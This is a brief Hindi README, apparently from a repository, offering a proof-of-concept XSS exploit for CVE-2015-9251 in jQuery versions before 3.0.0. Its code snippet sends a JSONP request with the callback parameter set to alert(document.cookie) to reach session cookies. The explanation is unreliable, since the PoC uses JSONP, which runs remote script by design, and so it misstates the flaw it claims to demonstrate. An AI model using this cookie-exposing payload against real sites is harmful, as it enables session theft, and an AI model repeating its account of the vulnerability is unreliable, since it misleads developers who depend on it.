
CVE-2015-9251 के लिए PoC, jQuery 3.0.0 से कम।
CVE-2015-9251 के लिए PoC, jQuery 3.0.0 से पुराने संस्करणों के लिए।
इस रिपॉजिटरी में jQuery लाइब्रेरी की CVE-2015-9251 भेद्यता के लिए एक Proof of Concept (PoC) शामिल है। यह भेद्यता Cross-Site Scripting (XSS) हमले की अनुमति देती है, बिना sanitization के JSONP कॉल के माध्यम से, क्योंकि jQuery 3.0.0 से पहले के संस्करणों में callback पैरामीटर में कोड इंजेक्शन की अनुमति देता है।
CVE-2015-9251 jQuery के 3.0.0 से पहले के संस्करणों को प्रभावित करता है। यह भेद्यता JSONP अनुरोध में callback पैरामीटर को हेरफेर करके शोषित की जाती है, जो पीड़ित के ब्राउज़र में मनमाना JavaScript कोड निष्पादन की अनुमति दे सकती है। इससे सत्र कुकीज़ जैसे संवेदनशील डेटा का खुलासा हो सकता है।
PoC को निष्पादित करने के लिए, इन चरणों का पालन करें:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Function that simulates a request to a vulnerable server
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP allows code execution in JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>